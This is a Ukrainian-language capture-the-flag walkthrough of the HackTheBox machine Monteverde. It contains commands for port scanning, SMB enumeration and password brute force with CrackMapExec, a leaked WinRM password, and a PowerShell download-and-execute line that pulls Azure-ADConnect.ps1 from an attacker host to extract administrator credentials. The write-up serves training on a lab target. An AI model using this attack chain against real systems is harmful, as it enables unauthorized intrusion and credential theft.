Дізнайтеся, як пройти машину Monteverde на HackTheBox: сканування портів, брутфорс SMB, використання групи Azure Admins для підвищення привілеїв та отримання доступу адміністратора.
Ця машина має IP адресу 10.10.10.172, яку додаємо в /etc/hosts.
10.10.10.172 monteverde.htb
Спершу виконується сканування відкритих портів. Для економії часу початкове сканування здійснюється за допомогою masscan, оскільки перевірка всіх портів через nmap займає більше часу.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.172 --rate=500
На хості відкрито багато портів. Тепер проскануємо їх за допомогою nmap, щоб відфільтрувати та вибрати потрібні.
nmap monteverde.htb -p49778,88,593,49667,53,445,5985,49675,9389,3268,49706,389,464,49674,139,636,135,3269,49673
Тепер для отримання більш детальної інформації про послуги, що працюють на портах, запустимо сканування з опцією -А.
nmap -A monteverde.htb -p88,593,53,445,5985,9389,3268,389,464,139,636,135,3269
Насамперед перевіряємо SMB. Зробимо це за допомогою enum4linux. Так ми отримаємо користувачів, а також членство їх у групі.
enum4linux -a monteverde.htb
Як завжди, у процесі пошуку точки входу паралельно здійснюється брутфорс паролів. Зважаючи на те, що парольна політика передбачає мінімальну довжину пароля у 7 символів, створюються відповідні списки для підбору.
А тепер запустимо брут за допомогою CrackMapExec.
cme smb monteverde.htb -u ./users.txt -p ./passwords.txt
На диво, це дало результат — вдалося знайти облікові дані користувача. Тепер перевіряються ресурси, доступні цьому користувачеві.
cme smb monteverde.htb -u SABatchJobs -p SABatchJobs --shares
Звернемося до ресурсу users$.
smbclient -U SABatchJobs%SABatchJobs //10.10.10.172/users$
Давайте рекурсивно переглянемо всі файли на сервері.
І подивимося, що у файлі.
Тепер підключаємось до WinRM та забираємо прапор користувача.
evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
Перевіряємо інформацію про обліковий запис користувача.
Він складається з групи Azure Admins — це вектор LPE. Використовуємо Azure-ADConnect для підключення до бази Azure. Завантажуємо скрипт з локального сервера на згадку про віддаленій машині і виконуємо.
IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.60/Azure-ADConnect.ps1')
Azure-ADConnect -server 127.0.0.1 -db ADSync
Отримуємо облікові дані адміністратора. Підключаємося і забираємо прапор.
Забезпечено повний доступ до системи.
Пройшовши машину Monteverde на платформі HackTheBox, було продемонстровано, як практичні навички у сфері кібербезпеки допомагають знаходити вразливості та отримувати контроль над системою. Крок за кроком виконано сканування портів, підбір паролів, аналіз прав доступу та підвищення привілеїв до рівня адміністратора.
Цей процес підкреслює важливість знань у роботі з мережевими протоколами, вразливостями облікових записів і специфікою інтеграції з Azure. Для спеціалістів із кібербезпеки це не лише тренування технічних навичок, а й важливий урок про цінність захисту своїх систем від подібних атак.
